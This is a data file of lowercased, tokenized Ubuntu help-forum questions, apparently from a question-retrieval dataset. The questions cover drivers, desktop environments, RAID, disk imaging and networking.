glibc_2.3.4 ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libpython2.6.so.1.0 ( ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 librt.so.1 ( ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 librt.so.1 ( glibc_2.2.5 ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libsm.so.6 ( ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libssl.so.0.9.8 ( ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libstdc++.so.6 ( ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libstdc++.so.6 ( cxxabi_1.3.1 ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libstdc++.so.6 ( cxxabi_1.3 ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libstdc++.so.6 ( glibcxx_3.4 ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libstdc++.so.6 ( glibcxx_3.4.9 ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libtiff.so.3 ( ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libutil.so.1 ( ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libx11.so.6 ( ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libxinerama.so.1 ( ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libxm.so.4 ( ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libxt.so.6 ( ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64 libxxf86vm.so.1 ( ) ( 64bit ) is needed by geomatica-2012-12.0-0.x86_64
63852	incorrect port , user and password for my futon couchdb.html	my ~/.local/share/desktop-couch/couchdb.html has the wrong values for port , username and password . it seems quite likely that this is due to a reinstall without formatting /home . my python scripts work well with my desktopcouch , but i would like to use futon as well . what is the most elegant way of recreating that file with proper values ?
63858	ca n't have access to the menu of desktop unless i click any icon at the launcher	i have recently installed nautilus elementary for which i 've read about here . i think after this change the problem arised . now everytime i log in my account and before clicking any other icons at the launcher i can not see the menu `` file edit view places help '' on the top bar . even if i click an of the indicators i still ca n't access that menu . what is wrong ? something with the `` focus '' of the application ? thank you !
63859	how do i install lmsensors on a server ?	i am trying to install lm-sensors on ubuntu server 11.04 with the following command sudo apt-get install lm-sensors , but i am getting the following error : error package lm-sensors has no installation candidate . i need a program that can show me detailed statistics about temperatures and usage of my components ( cpu , ram , hdd ) like lm-sensors . if i can not install it , exist other option like lm-sensors ?
63863	unknown monitor , intel driver , want to set vga resolution to widescreen tv	i have a sony bravia lcd television , which is now plugged into my laptop using a vga cable . i am running an hp compaq laptop , with a video driver of : 00:02.0 vga compatible controller : intel corporation mobile 915gm/gms/910gml express graphics controller ( rev 03 ) in earlier versions of ubuntu , it was nearly at the right resolution ; in a brand new installation of ubuntu 11.04 , however , it has reverted to a maximum of 1024x768 . trying to set the resolution using xrandr is giving me annoying error messages , and i read conflicting information about the latest version of ubuntu not using xorg.conf to set my resolution : is that right ? i 'd be grateful for a little bit of help here : in either convincing ubuntu to recognise the monitor , or to force ubuntu to change the resolution . since i 'm running this as an external monitor , and the internal lcd screen works perfectly , i 'm concerned about breaking the internal lcd support with display reconfiguration as well .
63866	minimize/maximize all windows command ?	i was wondering if there was a shell command that minimizes/maximizes all windows . i have heard of wmctrl -k on , but the program 'wmctrl ' is not a default in ubuntu . thanks !
63868	background does n't cover the whole screen	i 'm facing another problem with unity these days . current problem is about the background orientation . i have attached the image to the question so you can view and recognize what the problem is . thanks in advance .
63873	random photo order when selecting a tag	my shotwell library is ordered by descending date . when i click on a tag in shotwell , the photos appear in an apparently random order . if i see the sorting options , descending date is selected . i have to select other option , and then go back to descending date , to get the order right . if i then choose another tag , photos in the wrong order . if i go back to the first , they are right . but if i close shotwell and launch it again , the sorting is wrong everywhere again . this is exactly the same problem as this : photos not ordered when selecting events or tags but the solution given there , upgrading to 0.10 , did n't work . i 'm in fact in 0.11.1 . any idea ? shotwell is really great for me , apart from this little nuisance . thanks !
63874	ubuntu 11.10 powers down automatically	ubuntu 11.10 automatically powers down after a period of non-use . for example , i ca n't leave my computer on over night when i am downloading large files because it shuts down . is this a bug or is there a setting that addresses this ? thanks , benjamin
63875	howto access ubuntu one couchdb	i 'm trying to connect to the cloud couchdb at ubuntu one , but i always get the following error message : { `` error '' : '' unknown_error '' , '' reason '' : '' function_clause '' } i tried following requests : https : //couchdb.one.ubuntu.com/u % 2f8e4 % 2f437 % 2f554355 % 2fcontacts/_all_docs https : //couchdb.one.ubuntu.com/u % 2f8e4 % 2f437 % 2f554355 % 2fcontacts % 2f_all_docs https : //couchdb.one.ubuntu.com/u % 2f8e4 % 2f437 % 2f554355 % 2fcontacts/_all_docs the same error occurs if i try to get the welcome string from the db . does anyone has an idea whats going wrong ?
63877	3d game engine scriptable in lua	i searched for 3d game engine scriptable in lua language . i found some where cafu engine is looks good . what is the best and frequently used 3d game engine ( lua language ) i found a post here for 3d game engine where openscenegraph and ogre were mentioned . but both are c++ not lua scriptable . please help . thanks in advance .
63878	i ca n't sign in : `` an exception representing an authentication failure ''	i get this message `` an exception representing an authentication failure '' when trying to sign in on ubuntu one for windows for the first time . i can sign in on the web but not in the software . i have tried to exclude it from av and run it as administrator and all . still not getting any results . what to do ?
63879	can not see my files but i see a lost_found folder and can not boot ubuntu 10.04	i shrunk my ubuntu 10.04 drive and did n't format it . now , my ubuntu ca n't boot and when i try booting with ubuntu 10.04 live cd , i can not see anything . i can only see the lost+found folder . i have repaired the grub with the live cd and repair it with super grub 2.0 too but that does n't fix it . finally i had to install windows 7 64bit on another drive and in the windows i tried with linuxreader to access the linux drive and in this program i am able to see see all folders in the linux partition but all the folders are empty but the partition had size ( about 14 gig ) how can i access my files and recover my ubuntu os without re-installing it ?
63881	is unity a de , a wm or a desktop shell	people seem confused about what unity actually is . can you please clarify if it is a desktop environment ( de ) , window manager ( wm ) or just a shell . thanks -actionparsnip ( irc ) - shadoweater120880 ( youtube )
63884	how to make some virtual ip address ?	i want to make some virtual ip addresses for my network adapter or wireless adapter , so that i can connect to network with more than one ip address from one computer or laptop . how can i do it ? ( i know it 's possible , because one of my friends has done it in university and have more than one - some times till 255 - ip address in network ) .
63890	amd hd 6850m , acer 7750g driver issues	i have the configuration mentioned in the title . to name the exact problem : i wanted to be a full linux convert from windows . bought very fast laptop but did not check graphics compatibility . now after installing the proprietary driver from ati ( amd ) on ubuntu 10.10 gives me `` not supported '' watermark on the right bottom . after checking some forums ( google is your best friend ) i discovered that my lap has 2 graphic cards , amd hd 6850m and intel hd3000 as secondary . also , after installing this driver it slows down my graphics ( so slower as with the default open source ) . my question : is there any way to unleash the potential of my graphics with this proprietary driver ? is using the open source drivers the only option ? i do n't think the actual ati graphic card is used , but the intel3000 by mistake . ps : natty gives no better results edit 15.12.2011 : it works , it works ! ! ! i`m so happy : ) installed build-essential downloaded the newest catalyst from amd site ran install sudo sh amd ... xxx.sh restart i guess also the install is better to do before installing pae kernel . thank you guys
63891	how to integrate gnome-online-accounts ?	there is a new feature called gnome-online-accounts , which has been introduced in gnome3 , but its still not integrated into ubuntu 11.10 . does anyone know how to get this working ?
63892	is logitech hd webcam c615 supported ?	is logitech hd webcam c615 supported under ubuntu ? the list of drivers can be found here : http : //www.ideasonboard.org/uvc/ but logitech hd c510 is not on that list and i have that camera and it works great , is it so with hd c615 ?
63897	how to sync files from two operating systems to a same folder using u1 ?	i have set up ubuntu one on one windows and one ubuntu computer . i want to synchronize my files between the windows and ubuntu computer . now i have two folders in the cloud . one windows folder and one ubuntu one folder . i would like to merge these folders such that both the windows and ubuntu computer both have the same files . how can this be done ?
63898	problem while trying to burn ubuntu live disc	how can i find out the capabilities of my cdrom device ? i 've been trying to burn the live cd , but i ca n't . ubuntu software says me there is no media in the cd drive . i then used a usb stick , but i 'd like to use the cd drive too . should i try to get a new hardware driver for it , since it does seem to be unable to recognise an empty disc . quite new to ubuntu , or linux in general , so please keep the solution simple .
63900	connecting ubuntu via a hdmi cable	i 'm trying to connect ubuntu to my tv via a hdmi cable as i do with windows 7 , is this possible and if so how .
63901	sony vaio vpc-eh1s0e bluetooth and num lock	notebook : sony vaio vpc-eh1s0e ram : 4gb graphics : intel hd3000 cpu : intel core i5-2410m i 've got 2 problems : 1 ) i 've always the bluetooth on when i boot or reboot . i want to turn it off ( i do n't use bluetooth ) 2 ) i 've always the num lock off when i boot or reboot . i wanto to have it on forever
63917	how much free space should i have on my hdd ?	i know this could sound like a silly question . but i have always wondered what the free space on a ubuntu partition should be ! with should be i mean how much do i need free to be able to run everything as smoothly as possible and get the best amount of speed form my computer . is it 10 % ? 10gb ? or something else ? is it specific for this hard drive or only the ubuntu partition ? is it specific for `` /home '' ? ( if you have separate system and personal stuff . )
63919	how do i access the settings in first time wizard in e17 ?	... and other settings in general . i want to change the behavior of the mouse when hover on an icon , it will highlight instead of click ( which is available from firs time setup ) . also , i enable the effects , which is quite heavy for my machine and i want to turn it off . where to adjust it ? i 've just installed e17 , so i 'm still new to it .
63920	is there a way to pre-order a pack of 5 cd/dvds for the upcoming ubuntu 11.10 ?	sure , i could just wait and download it , but i really want to get my hands on it right away . besides , i do n't have a fast connection where i 'm currenly living so it could take some time to download . thanks for your attention . by the way , i know there 's a lauching party on a city nearby , but i really do n't think i could make it on time > . <
63921	unity 3d does n't work anymore , just shows a menu on the top	i no longer have unity 3d in ubuntu 11.10 . after i reinstalled unity 3d , my desktop looks like this : any suggestions ?
63922	how do i set up a webcam server for http ?	there used to be a package webcam-server , but it is no longer there . i would like to be able to view the picture from a logitech usb webcam in a browser in a different computer in the same network . i have an apache server set up for something else , so port 80 is used . note : the webcam definitely works with my computer ; i can view it with other programs .
63923	extract gnome gconf settings from external partition	are there any files in /etc/ or /home/ where the gconf data is actually written to ? how can i make these work on a new system ( preferably in terminal ) ? there are standard ways dumping/importing gconf settings in a working distribution ; mine is dead now - i 'd like to backup/restore the old settings .
63924	how can i backup compact disc media to iso files on ubuntu ?	problem : i created 3 dvd 's filled with windows system recovery disks in case i ever have a hardware problem and need to re-install windows in order to run diagnostic tests . however , i do n't want to worry about losing them , so i would like to make backups of the recovery disks as iso images which i can store on an external hard drive . a google search revealed that i can do this using the dd ( or `` disk dump '' ) unix command . dd if=/dev/who-knows-where ? of=/home/wdkrnls/x201-recovery-2011-09-30.iso but the snag is that ubuntu does n't use the old convention of associating /dev/cdrom with the cd-rom drive . instead nautilus automagically creates /media/cd_rom which is a directory , and not the drive itself . i tried to run dd anyways and got : /bin/dd : reading '/media/cd_rom/ ' : is a directory 0+0 records in 0+0 records out 0 bytes ( 0 b ) copied , 0.0158501 s , 0.0 kb/s i tried running dmesg | tail and saw a reference to : [ 215135.134164 ] sr 9:0:0:0 : attached scsi generic sg1 type 5 so i tried ls /dev/sg1 , but there was n't any file called that . only my partitions show up with sudo fdisk -l , leaving me stumped as to what to try next . solution : i figured out i could solve my problem with brasero or k3b and so abandoned my exploration of ubuntu 's internals . nevertheless , i still would n't mind knowing how i would use dd to accomplish the same task . how would i solve my problem with dd ?
63925	can i click the background of a nautilus window to go up a directory ?	i use windows 7 at work and i 've installed an extension there that lets me click the background of a windows explorer window to go up one directory . i 've found it extremely useful , and i was wondering if there were any extensions or whatnot that might provide this functionality in nautilus .
63926	is ubuntu 10.04 compatible with asus sabertooth p67 motherboard ?	i am building a new pc and consider using a asus sabertooth p67 motherboard . i want to install ubuntu 10.04 , as this release is supported to 2013 . i have done some research on the web , but i can not find anything on how well the motherboard works with ubuntu 10.04 . are anyone using this motherboard that can tell if it works well out of the box with ubuntu 10.04 ?
63929	`` stable release publishing '' part of developer.ubuntu.com ?	are non-commercial applications going to be published in the software center even if a new version of ubuntu is n't out yet ?
63930	how can i invert my display colours under kubuntu ?	i installed the kde graphical interface to run alongside gnome for my 10.10 installation . for the most part , it seems to work well , and the extra eye candy is appealing . however , there is one thing that is bugging me , and that is color inversion . in gnome , all i have to do is press the win-n keys and the application window inverts colors . this is especially useful when reading text , since i find it much easier on the eyes to read white on black text . however , this combination does n't work in kubuntu . is there a hack or workaround existing so i can have this functionality in both window managers ?
63932	advice on moving partitions with gparted after cloning drive to a larger one	i recently cloned my hard drive to a new one with an additional 250gb of space ( 232gib per gparted ) . this has left 232 gib of unallocated space at the end of the drive that i would like to redistribute amongst the existing partitions . i would like to add some to sda1 , some to sda2 , etc.. i realize that one can only merge partition space when the unallocated space is adjacent , but ca n't figure out the best way to do this , given existing partitions are all primary ... can someone advise on this ? btw , since this is a cloned drive , the original is still intact , so i do n't need to backup .
63933	can not get dual monitors to work on different gpus	my setup is a follows : 19 '' 1440x900 monitor on my nvidia 460 gtx 17 '' 1280x1024 monitor on the internal nvidia card now , i am able to get a xserver running on both monitors , but i am trying to figure out how to get the two monitors to function like they do in windows ( where you can drag windows from one monitor to the other ) ? when i try to enable xinerama , i get a message along the lines of `` the current settings can not be completely applied due to ... xinerama is being enabled ... '' . what should i be doing/put in my xorg.conf file or am i completely missing something ? xorg.conf : # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 270.29 ( buildd @ allspice ) fri feb 25 14:42:07 utc 2011 # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 270.41.06 ( buildmeister @ swio-display-x86-rhel47-08.nvidia.com ) mon apr 18 15:14:00 pdt 2011 section `` serverlayout '' # removed option `` xinerama '' `` 0 '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 screen 1 `` screen1 '' rightof `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 1 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` envision g19lwk '' horizsync 30.0 - 83.0 vertrefresh 50.0 - 76.0 option `` dpms '' endsection section `` monitor '' identifier `` monitor1 '' vendorname `` unknown '' modelname `` nec lcd1760nx '' horizsync 31.0 - 81.0 vertrefresh 56.0 - 75.0 endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 460 '' busid `` pci:3:0:0 '' endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` nforce 750a sli '' busid `` pci:2:0:0 '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` metamodes '' `` nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` twinviewxineramainfoorder '' `` crt-0 '' option `` metamodes '' `` nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection
63935	how to specify non-default audio stream to mplayer ?	i have an avi with two audio streams inside . how to play it with mplayer using the 2nd non-default audio stream ?
63939	sometimes empty application search results in unity	i saw a bunch of other questions here asking about the search results of unity , but mine is slightly different . sometimes , when i search for an application in unity , no search results come up for the application . for any application for that matter . what i usually end up doing is restarting the computer or logging out then back in . when i click on `` more apps '' , there are no apps listed there unless i re-login . what 's a better way to refresh the index ( ? ) without re-logging in ?
63940	alt-tab showing filenames	i am running ubuntu 11.04 with the standard unity configuration . i often work with many pdfs open , using evince as my reader . however , from the small visual preview that alt-tab provides , it is hard tell which pdf is which . is there a any different window selection mechanism which shows the filename of open files ? if so , that would be great . thanks .
63943	where is the terminal server client ( tsclient ? )	i accidentally done partial upgrade and there was gnome3 ppa and broke my unity . after failed attempt to rescue ( ppa-purge et al ) i decided the only solution was to upgrade to oneiric beta2 ( fresh install is not an option ) . now in natty i was using terminal server client to do remote connection ( mostly rdp ) . i can not find tsclient in package . i have googled with no avail . i have tested remmina and the other ubuntu rdp packages and i 'm dissatisfied at best . is there a way to install terminal server client ? did oneiric abandon it ? what is their proposed alternative ? imho terminal server client is the best rdp client ( gui ) thanks !
63944	installing updates from hard drive	i am using oneiric beta 2 . installed it yesterday . then downloaded 350+ mb of updates and installed it . then when i tried to auto-mount my drives using storage manager , i screwed up and the system will boot right up to the ubuntu splash screen , then turn off . anyways planning to reinstall ubuntu again . but i do not want to have to download the updates again . i have a copy of all the downloaded update files with me . can anyone tell me how i can install the updates from the hard drive without downloading them again ? ? thanks in advance ... ..
63947	how can i help canonical be profitable ?	i can buy cloud space from ubuntu one instead of dropbox , etc ... . right ? does buying system76 computers help canonical in anyway ? what else can we do ? please add to this list .
63956	iptables on desktop	i have some iptables rules and a policy that i want to apply to my desktop . where is the the configuration file that will make these changes permanent ? is there any issues with using iptables and networkmanager ?
63957	how to get rid of problems with booting	when i boot up , it says very quickly prefix error then gets me to a options dialog . i click enter and it takes a while . is there a way to fix this so that it can go to the logo and boot up instead of doing the same thing all the time ?
63962	how to access shared files on ubuntu from a windows machine ?	i have shared a folder on my ext4 drive mounted at /media/data using the gui . now it appears in my places - > network and i 'm able to access it , after giving password , at smb : //wim-ubuntu/ab/ however in windows i ca n't access the share , they see this error : i have tried creating a user on the ubuntu machine with username/password which match what the windows user has , but no joy ... what am i missing ? the 'diagnose ' button on windows does n't really offer anything useful , it says that the location wim-ubuntu exists but the share can not be found .
63966	how do i get my music back on banshee ?	my banshee media player on my laptop deleted all my songs . i pressed `` remove from library '' on one song and it deleted all my songs . how do i get them back ? i need help asap .
63968	what video editing programme is capable of placing two videos side by side ?	i would like to show the left half of the first video on the left , and the right half of the second on the right . are there any programmes that offer this feature , or is there a workaround anyone can think of ?
63972	how to create own video	i have to create my own video as a promo of our technical event.how to create it with ubuntu 11.04 ? which software is ideal for this purpose ?
63974	net not working in 11.04	i have the following system : amd athlon ii x4 635 kingston 4gb ddr3 1333 500gb seagate sata cm gx 450w 85+ bronze i have win7 along with ubuntu 11.04 now the thing is when i installed 11.04 inside win7 via wubi ( jut to try unity ) the net was working fine but when i installed ubuntu on a separate partition as dual boot option , net is not working i asked the same question here too ... .so all the required terminal command results are here piyush @ piyush-ms-7623 : ~ $ lspci -nnk | grep -ia2 net 02:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 03 ) subsystem : micro-star international co. , ltd. device [ 1462:7623 ] kernel driver in use : r8168 piyush @ piyush-ms-7623 : ~ $ ifconfig -a eth0 link encap : ethernet hwaddr 6c:62:6d:4e:86 : c9 inet addr:172.22.1.1 bcast:172.22.255.255 mask:255.255.0.0 inet6 addr : fe80 : :6e62:6dff : fe4e:86c9/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:7295 errors:0 dropped:24 overruns:0 frame:0 tx packets:498 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1061933 ( 1.0 mb ) tx bytes:49348 ( 49.3 kb ) interrupt:43 base address:0x4000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:392 errors:0 dropped:0 overruns:0 frame:0 tx packets:392 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:29902 ( 29.9 kb ) tx bytes:29902 ( 29.9 kb ) piyush @ piyush-ms-7623 : ~ $ lsmod module size used by binfmt_misc 17565 1 snd_hda_codec_hdmi 28103 1 snd_hda_codec_realtek 336693 1 snd_hda_intel 33211 2 snd_hda_codec 103804 3 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel snd_hwdep 13604 1 snd_hda_codec snd_pcm 96625 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec radeon 982197 3 snd_seq_midi 13324 0 snd_rawmidi 30486 1 snd_seq_midi snd_seq_midi_event 14899 1 snd_seq_midi snd_seq 61621 2 snd_seq_midi , snd_seq_midi_event ttm 76664 1 radeon ppdev 17113 0 snd_timer 29602 2 snd_pcm , snd_seq snd_seq_device 14462 3 snd_seq_midi , snd_rawmidi , snd_seq drm_kms_helper 42136 1 radeon psmouse 73535 0 drm 227495 5 radeon , ttm , drm_kms_helper edac_core 53845 0 serio_raw 13166 0 snd 67382 14 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device edac_mce_amd 23464 0 k10temp 13119 0 i2c_algo_bit 13400 1 radeon parport_pc 36959 1 sp5100_tco 13744 0 soundcore 12680 1 snd snd_page_alloc 18529 2 snd_hda_intel , snd_pcm i2c_piix4 13303 0 shpchp 37297 0 xhci_hcd 77643 0 lp 17825 0 parport 46458 3 ppdev , parport_pc , lp usbhid 46956 0 hid 91020 1 usbhid ahci 25951 4 pata_atiixp 13165 0 libahci 26642 1 ahci r8168 194904 0 pata_jmicron 12747 0 piyush @ piyush-ms-7623 : ~ $ dmesg | grep r8 [ 0.000000 ] percpu : embedded 28 pages/cpu @ ffff8800cfc00000 s84416 r8192 d22080 u262144 [ 0.000000 ] pcpu-alloc : s84416 r8192 d22080 u262144 alloc=1*2097152 [ 2.764724 ] r8168 gigabit ethernet driver 8.024.00-napi loaded [ 2.764752 ] r8168 0000:02:00.0 : pci int a - > gsi 17 ( level , low ) - > irq 17 [ 2.764770 ] r8168 0000:02:00.0 : setting latency timer to 64 [ 2.764825 ] r8168 0000:02:00.0 : irq 43 for msi/msi-x [ 2.838401 ] r8168 : this product is covered by one or more of the following patents : us5,307,459 , us5,434,872 , us5,732,094 , us6,570,884 , us6,115,776 , and us6,327,625 . [ 2.838406 ] r8168 copyright ( c ) 2011 realtek nic software team < nicfae @ realtek.com > [ 11.669244 ] r8168 : eth0 : link down [ 13.221287 ] r8168 : eth0 : link up [ 13.660067 ] r8168 : eth0 : link up piyush @ piyush-ms-7623 : ~ $ route -n kernel ip routing table destination gateway genmask flags metric ref use iface 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 eth0 172.22.0.0 0.0.0.0 255.255.0.0 u 1 0 0 eth0 0.0.0.0 172.22.1.1 0.0.0.0 ug 0 0 0 eth0
63977	policykit is not initialised in custom xsession launched via lightdm	i 'm running a fully updated ubuntu 11.10 install and i 've been using lightdm to launch a `` user defined session '' which executes the .xsession script in my home folder . the script that i have written runs perfectly with the exception that i can not mount partitions in nautilus or access the user accounts entry of system settings . i presume this is a problem with policykit not starting correctly due to a problem with my script . any help would be appreciated . my .xsession : # ! /bin/bash ck-launch-session dbus-launch compiz & ck-launch-session dbus-launch gnome-settings-daemon & ck-launch-session dbus-launch docky & ck-launch-session dbus-launch synapse
63980	how do i rename an mdadm raid array ?	for some reason , when i try to rename an mdadm raid array to a textual name , the change does n't take . i tried the advice from this serverfault question , but to no avail . ~ $ mdadm -- version mdadm - v3.1.4 - 31st august 2010 ~ $ sudo mdadm -- detail /dev/md0 /dev/md0 : version : 1.2 creation time : tue sep 27 08:32:32 2011 raid level : raid1 array size : 1953513424 ( 1863.02 gib 2000.40 gb ) used dev size : 1953513424 ( 1863.02 gib 2000.40 gb ) raid devices : 2 total devices : 2 persistence : superblock is persistent update time : sun oct 2 17:59:37 2011 state : clean active devices : 2 working devices : 2 failed devices : 0 spare devices : 0 name : omicron:0 ( local to host omicron ) uuid : 75c4a555:482aecd0 : ade70dfc:1547926a events : 17 number major minor raiddevice state 0 8 80 0 active sync /dev/sdf 1 8 96 1 active sync /dev/sdg ~ $ sudo mdadm -- stop /dev/md0 mdadm : stopped /dev/md0 ~ $ sudo mdadm -- assemble /dev/md/alpha -- update=name /dev/sd [ gf ] mdadm : /dev/md/alpha has been started with 2 drives . ~ $ sudo mdadm -- detail /dev/md0 /dev/md0 : version : 1.2 creation time : tue sep 27 08:32:32 2011 raid level : raid1 array size : 1953513424 ( 1863.02 gib 2000.40 gb ) used dev size : 1953513424 ( 1863.02 gib 2000.40 gb ) raid devices : 2 total devices : 2 persistence : superblock is persistent update time : sun oct 2 18:06:11 2011 state : clean active devices : 2 working devices : 2 failed devices : 0 spare devices : 0 name : omicron:0 ( local to host omicron ) uuid : 75c4a555:482aecd0 : ade70dfc:1547926a events : 17 number major minor raiddevice state 0 8 80 0 active sync /dev/sdf 1 8 96 1 active sync /dev/sdg ~ $ cat /proc/mdstat personalities : [ linear ] [ multipath ] [ raid0 ] [ raid1 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] md0 : active raid1 sdf [ 0 ] sdg [ 1 ] 1953513424 blocks super 1.2 [ 2/2 ] [ uu ] md126 : active ( auto-read-only ) raid1 sdd [ 0 ] sde [ 1 ] 1953513424 blocks super 1.2 [ 2/2 ] [ uu ] md127 : active ( auto-read-only ) raid1 sdb [ 0 ] sda [ 1 ] 976762496 blocks [ 2/2 ] [ uu ] unused devices : < none > as you can see , the name is still reported as omicron:0 and still reachable through the old device file . trying sudo mdadm -- detail /dev/md/alpha will work , and report the same , wrong , name until the next reboot , when it stops working . it seems as if when figuring out what name to put in , mdadm gets confused and just creates the device file instead . aside is there any way to make mdadm force an update of the name part of the superblock ( i.e . explicitly set the name you want the array to have ) without having to explicitly re-create the superblock ? ( i.e . sudo mdam -- zero-superblock /dev/sd [ fg ] ; sudo mdadm -- create /dev/md/alpha -- raid-devices=2 -- level=1 -- assume-clean -- name=alpha /dev/sd [ fg ] ) the problem is that after reboot , despite adding array /dev/md/alpha metadata=1.2 name=omicron : alpha uuid=c66a267 ... to mdadm.conf , the named device file dissapears and is replaced with one of standard format . ( /dev/md125 or similar ) how can i make a renamed mdadm array keep its name ? - i.e . - how can i make ubuntu persist the device files between boots ?
63984	creative labs sb x-fi not working on 11.04	just did a clean install on my dell xps 710 h2c of 11.04 64 bit and now my creative labs pci express sb x-fi xtreme gamer ( sbo460-d ) is n't working . shows up in preferences/sound , hardware tab as sb-fi with a full list of options in pull-down ( setting for the selected device ) and have tried them all and can only get front 2 speakers to work in some with horrible sound . have tried finding the beta linux drivers from creative ( xfidrv_linux_public_us_1.00.tar.gz ) but they seem to have been removed from all sites . has anyone gotten this card to work properly on 11.04 64 bit ? anyone have suggestions for a decent replacement card ? side note , when doing my clean install , i set up dual boot win7 64 bit and it does n't work properly on that os either . have gone through downloading new drivers from creative , etc for that os also to no avail . i do n't have a problem with replacing the card but want to make sure i get a good , plug and play one that i do n't have to fight with getting to work on both these operating systems ... < <
63985	avahi daemon constantly needs restarting	i have ubuntu 11 running on a thinkpad w520 . things work great , but not avahi-daemon . it seems that my laptop becomes invisible ( ssh user @ hostname.local ca n't find the laptop ) to other computers on the network . then i have to sudo service avahi-daemon restart . it seems i have to do this every day or two . is there a way to avoid having to restart avahi-daemon so often ?
63986	is it possible to have different gtk+ theme in unity and gnome shell ?	i sometimes use two different desktop environments like unity and gnome shell ( comparing , testing , creating screenshots , etc . ) but unity looks bad using adwaita theme , which is the same with gnome shell and ambiance theme . changing every time is quite a hassle and sometimes ( but now less frequent than before ) it crashes ( i 'm using oneiric ) .
63987	gnome shell does n't read extensions	i tried installing extensions through gnome tweak tool , manually through the .local/share directory and also through ppa when i can but still ca n't see the extension on the panel . any thoughts ?
63988	how do i get rid of this extra battery icon ?	on ubuntu 11.04 i had the battery-status indicator applet installed . after the upgrade to ubuntu 11.10 beta i do not want to use the applet any longer . i deinstalled it , but i can not get rid of the icon in the panel . how can i delete the icon ? screenshot : left one is the `` old '' one , right icon is the one from gnome-power-manager
63992	building an i5-2500ks c/w 8gb ram and ssd drive , should i use 64-bit ?	should i use the 64bit version or the 32bit . will it satisfy me coming from a windows system background . sounds like a great alternative ? just wondering if anybody has done similar ?
63999	how can i install typing break ?	i 've just upgraded to beta 2 of oneiric/11.10 and the typing break has gone . i 've gone into the system settings and looked in `` keyboard layout '' and `` keyboard '' and ca n't find anything . has it just been dropped ? is there some hidden way to re-enable it ?
64001	how do i change the wallpaper of the login screen ?	i would like to set the wallpaper in the login screen ( unity greeter ) , how do i do that ?
64005	launcher does n't respect tmpdir	in my .bashrc , i define tmpdir= $ { home } /tmp so temporary files are under my encrypted $ home . emacs , invoked from the launcher , does n't see this definition , but emacsclient , invoked from a shell does . so far , i know that emacs ( after ( server-start ) ) opens a socket in '/tmp ' , 'emacsclient ' tries to communicate with 'emacs ' over a socket in ' $ { home } /tmp ' , and does very poorly . how can i presuade the launcher ( via emacsclient.desktop ? ) to pass the right value for tmpdir ?
64006	changed look of nautilus after update	i am using ubuntu 11.04. my sources.list is the default one , i have not change it . i just updated nautilus package in synaptic manager and after restart nautilus looks like gnome3 nautilus with an ugly theme . system theme is still the default . i also can not right click in the desktop . how can i restore previous nautilus and desktop . i am providing preview of nautilus
64007	why are these directories called file systems ?	/proc , /usr , /var , /home are called file systems . what does that mean ? i thought there was only one file system ( e.g . ext4 ) ..
64010	how to add custom links in the left pane of nautilus ?	until recently , one could add custom links to the left pane of nautilus by dragging a folder . it seems this option no longer works ( since ubuntu 10.10 ( maverick meerkat ) or 11.04 ( natty_narwhal ) ) . how do i get this to work on a recent version of ubuntu ?
64011	how safe is update to gnome3 ?	how safe is update natty with gnome3 provided by this ppa ? are there any known issues which can cause serious trouble ? i do n't care about `` look and feel '' issues but i need to : do not lose my data . never , no way . be able to run ide , browser , music player , im , evince etc ... the `` main '' apps , basicaly those which are present in clean ubuntu installation . is it safe to update ? if not , when is the stable version going to be released ?
